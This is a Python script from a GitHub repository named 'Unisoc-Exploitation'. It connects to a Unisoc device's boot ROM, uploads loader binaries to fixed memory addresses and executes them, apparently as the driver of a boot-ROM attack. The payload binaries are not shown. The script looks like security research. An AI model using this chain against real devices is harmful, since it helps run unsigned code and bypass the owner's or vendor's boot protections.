Unisoc-Exploitation/exploit.py at main · mutur4/Unisoc-Exploitation · GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
#! /usr/bin/python3

from flashtool import *
import os

MAX_SZ = 0x210

def brom_connect(flasher):
    flasher.cmd_send_ping()
    log.info("BROM version: {}".format(flasher.read_version()))

    flasher.cmd_connect()
    assert flasher.read_ack()


def send_payload(flasher, filename, addr):
    sz = os.stat(filename).st_size

    flasher.cmd_data_start(addr, sz)
    assert flasher.read_ack()


    with open(filename, "rb") as fp:
        for _ in range(sz // 0x210):
            flasher.cmd_data_send(fp.read(0x210))
            assert flasher.read_ack()

        flasher.cmd_data_send(fp.read())
        assert flasher.read_ack()

    log.info("EoF - Payload!")

    flasher.cmd_data_end()
    assert flasher.read_ack()


def main():
    g_ft = FlashTool()

    log.progress("Waiting for device....!")

    while True:
        if(g_ft.device_connect()): break

    # connect to BROM
    brom_connect(g_ft)

    #send the first-payload
    file = "./loader_0x65000800_1.bin"
    send_payload(g_ft, file, 0x65000800)

    #send the second-payload
    file = "./loader_0x65013fa0.bin"
    send_payload(g_ft, file, 0x65013fa0)

    #execute the loader at the above address
    g_ft.cmd_data_exec()

    #send the following second payload
    file = "./loader_0x65000800_1.bin"
    send_payload(g_ft, file, 0x65000800)

    #The execution of FDL-1
    g_ft.cmd_data_exec()
    log.info("FDL version: {}".format(g_ft.read_version()))


if __name__ == "__main__":
    main()